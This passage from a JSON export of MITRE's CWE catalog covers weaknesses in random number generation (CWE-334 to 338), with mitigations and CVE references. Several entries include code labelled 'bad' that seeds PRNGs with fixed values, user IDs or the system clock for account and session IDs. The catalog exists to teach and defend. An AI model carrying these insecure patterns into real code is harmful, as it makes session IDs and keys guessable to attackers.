numbers"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":[{"#text":"Failure of TRNG","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Insufficient Entropy in TRNG","attr":{"@_Date":"2009-05-27"}}]}},"334":{"attr":{"@_ID":"334","@_Name":"Small Space of Random Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The number of possible random values is smaller than needed by the product, making it more susceptible to brute force attacks.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"An attacker could easily guess the values used. This could lead to unauthorized access to a system if the seed is used for authentication and authorization."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-47"},"Intro_Text":"The following XML example code is a deployment descriptor for a Java web application deployed on a Sun Java Application Server. This deployment descriptor includes a session configuration property for configuring the session ID length.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;sun-web-app&gt;&lt;/sun-web-app&gt;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...&lt;session-config&gt;&lt;/session-config&gt;...","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;session-properties&gt;&lt;/session-properties&gt;","xhtml:div":{"#text":"&lt;property name=\\"idLengthBytes\\" value=\\"8\\"&gt;&lt;/property&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"&lt;description&gt;The number of bytes in this web module\'s session ID.&lt;/description&gt;","attr":{"@_style":"margin-left:10px;"}}}}}}}}},"Body_Text":["This deployment descriptor has set the session ID length for this Java web application to 8 bytes (or 64 bits). The session ID length for Java web applications should be set to 16 bytes (128 bits) to prevent attackers from guessing and/or stealing a session ID and taking over a user\'s session.","Note for most application servers including the Sun Java Application Server the session ID length is by default set to 128 bits and should not be changed. And for many application servers the session ID length cannot be changed from this default setting. Check your application server documentation for the session ID length default setting and configuration options to ensure that the session ID length is set to 128 bits."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0583","Description":"Product uses 5 alphanumeric characters for filenames of expense claim reports, stored under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0583"},{"Reference":"CVE-2002-0903","Description":"Product uses small number of random numbers for a code to approve an action, and also uses predictable new user IDs, allowing attackers to hijack new accounts.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0903"},{"Reference":"CVE-2003-1230","Description":"SYN cookies implementation only uses 32-bit keys, making it easier to brute force ISN.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1230"},{"Reference":"CVE-2004-0230","Description":"Complex predictability / randomness (reduced space).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0230"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Small Space of Random Values"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"335":{"attr":{"@_ID":"335","@_Name":"Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a Pseudo-Random Number Generator (PRNG) but does not correctly manage seeds.","Extended_Description":{"xhtml:p":["PRNGs are deterministic and, while their output appears\\n\\t\\t   random, they cannot actually create entropy. They rely on\\n\\t\\t   cryptographically secure and unique seeds for entropy so\\n\\t\\t   proper seeding is critical to the secure operation of the\\n\\t\\t   PRNG.","Management of seeds could be broken down into two main areas:","PRNGs require a seed as input to generate a stream of\\n\\t\\t\\t   numbers that are functionally indistinguishable from\\n\\t\\t\\t   random numbers.  While the output is, in many cases,\\n\\t\\t\\t   sufficient for cryptographic uses, the output of any\\n\\t\\t\\t   PRNG is directly determined by the seed provided as\\n\\t\\t\\t   input. If the seed can be ascertained by a third party,\\n\\t\\t\\t   the entire output of the PRNG can be made known to\\n\\t\\t\\t   them. As such, the seed should be kept secret and\\n\\t\\t\\t   should ideally not be able to be guessed. For example,\\n\\t\\t\\t   the current time may be a poor seed. Knowing the\\n\\t\\t\\t   approximate time the PRNG was seeded greatly reduces\\n\\t\\t\\t   the possible key space.","Seeds do not necessarily need to be unique, but reusing seeds may open up attacks if the seed is discovered."],"xhtml:ul":{"xhtml:li":["(1) protecting seeds as cryptographic material (such as a cryptographic key);","(2) whenever possible, using a uniquely generated seed from\\n\\t\\t   a cryptographically secure source"]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"If a PRNG is used incorrectly, such as using the same seed for each initialization or using a predictable seed, then an attacker may be able to easily guess the seed and thus the random numbers. This could lead to unauthorized access to a system if the seed is used for authentication and authorization."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-11495","Description":"server uses erlang:now() to seed the PRNG, which\\n\\t\\t\\t results in a small search space for potential random\\n\\t\\t\\t seeds","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11495"},{"Reference":"CVE-2018-12520","Description":"Product\'s PRNG is not seeded for the generation of session IDs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12520"},{"Reference":"CVE-2016-10180","Description":"Router\'s PIN generation is based on rand(time(0)) seeding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10180"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"PRNG Seed Error"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Modes_of_Introduction, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Description, Maintenance_Notes, Observed_Examples"}],"Previous_Entry_Name":{"#text":"PRNG Seed Error","attr":{"@_Date":"2017-11-08"}}}},"336":{"attr":{"@_ID":"336","@_Name":"Same Seed in Pseudo-Random Number Generator (PRNG)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A Pseudo-Random Number Generator (PRNG) uses the same seed each time the product is initialized.","Extended_Description":"Given the deterministic nature of PRNGs, using the same seed for each initialization will lead to the same output in the same order. If an attacker can guess (or knows) the seed, then the attacker may be able to determine the random numbers that will be produced from the PRNG.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"335","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The developer might not consider the need to use new seeds during design."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Other","Access Control"],"Impact":["Other","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not reuse PRNG seeds. Consider a PRNG that periodically re-seeds itself as needed from a high quality pseudo-random output, such as hardware devices."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code uses a statistical PRNG to generate account IDs.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private static final long SEED = 1234567890;public int generateAccountID() {}","xhtml:br":"","xhtml:div":{"#text":"Random random = new Random(SEED);return random.nextInt();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"Because the program uses the same seed value for every invocation of the PRNG, its values are predictable, making the system vulnerable to attack."},{"attr":{"@_Demonstrative_Example_ID":"DX-45"},"Intro_Text":"This code attempts to generate a unique random identifier for a user\'s session.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function generateSessionID($userID){}","xhtml:div":{"#text":"srand($userID);return rand();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["Because the seed for the PRNG is always the user\'s ID, the session ID will always be the same. An attacker could thus predict any user\'s session ID and potentially hijack the session.","If the user IDs are generated sequentially, or otherwise restricted to a narrow range of values, then this example also exhibits a Small Seed Space (CWE-339)."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Same Seed in PRNG"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267","@_Section":"Annex C, Approved Random Number Generators"}},{"attr":{"@_External_Reference_ID":"REF-1192"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Description, Modes_of_Introduction, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, References"}],"Previous_Entry_Name":{"#text":"Same Seed in PRNG","attr":{"@_Date":"2017-11-08"}}}},"337":{"attr":{"@_ID":"337","@_Name":"Predictable Seed in Pseudo-Random Number Generator (PRNG)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A Pseudo-Random Number Generator (PRNG) is initialized from a predictable seed, such as the process ID or system time.","Extended_Description":"The use of predictable seeds significantly reduces the number of possible seeds that an attacker would need to test in order to predict which random numbers will be generated by the PRNG.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"335","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Use non-predictable inputs for seed generation."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible."},{"attr":{"@_Mitigation_ID":"MIT-50"},"Phase":"Implementation","Description":"Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-102"},"Intro_Text":"Both of these examples use a statistical PRNG seeded with the current value of the system clock to generate a random number:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Random random = new Random(System.currentTimeMillis());int accountID = random.nextInt();","xhtml:br":""}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"srand(time());int randNum = rand();","xhtml:br":""}}],"Body_Text":"An attacker can easily predict the seed used by these PRNGs, and so also predict the stream of random numbers generated. Note these examples also exhibit CWE-338 (Use of Cryptographically Weak PRNG)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-11495","Description":"server uses erlang:now() to seed the PRNG, which\\n\\t\\t\\t results in a small search space for potential random\\n\\t\\t\\t seeds","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11495"},{"Reference":"CVE-2008-0166","Description":"The removal of a couple lines of code caused Debian\'s OpenSSL Package to only use the current process ID for seeding a PRNG","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166"},{"Reference":"CVE-2016-10180","Description":"Router\'s PIN generation is based on rand(time(0)) seeding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10180"},{"Reference":"CVE-2018-9057","Description":"cloud provider product uses a non-cryptographically secure PRNG and seeds it with the current time","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9057"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Predictable Seed in PRNG"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267","@_Section":"Annex C, Approved Random Number Generators"}},{"attr":{"@_External_Reference_ID":"REF-1192"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes, Observed_Examples, Potential_Mitigations, References"}],"Previous_Entry_Name":{"#text":"Predictable Seed in PRNG","attr":{"@_Date":"2017-11-08"}}}},"338":{"attr":{"@_ID":"338","@_Name":"Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG\'s algorithm is not cryptographically strong.","Extended_Description":{"xhtml:p":["When a non-cryptographic PRNG is used in a cryptographic context, it can expose the cryptography to certain types of attacks.","Often a pseudo-random number generator (PRNG) is not designed for cryptography. Sometimes a mediocre source of randomness is sufficient or preferable for algorithms that use random numbers. Weak generators generally take less processing power and/or do not use the precious, finite, entropy sources on a system. While such PRNGs might have very useful features, these same features could be used to break the cryptography."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If a PRNG is used for authentication and authorization, such as a session ID or a seed for generating a cryptographic key, then an attacker may be able to easily guess the ID or cryptographic key and gain access to restricted functionality."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use functions or hardware which use a hardware-based random number generation for all crypto. This is the recommended solution. Use CyptGenRandom on Windows, or hw_rand() on Linux."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-102"},"Intro_Text":"Both of these examples use a statistical PRNG seeded with the current value of the system clock to generate a random number:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Random random = new Random(System.currentTimeMillis());int accountID = random.nextInt();","xhtml:br":""}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"srand(time());int randNum = rand();","xhtml:br":""}}],"Body_Text":"The random number functions used in these examples, rand() and Random.nextInt(), are not considered cryptographically strong. An attacker may be able to predict the random numbers generated by these functions. Note that these example also exhibit CWE-337 (Predictable Seed in PRNG)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3278","Description":"Crypto product uses rand() library function to generate a recovery key, making it easier to conduct brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3278"},{"Reference":"CVE-2009-3238","Description":"Random number generator can repeatedly generate the same value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3238"},{"Reference":"CVE-2009-2367","Description":"Web application generates predictable session IDs, allowing session hijacking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2367"},{"Reference":"CVE-2008-0166","Description":"SSL library uses a weak random number generator that only generates 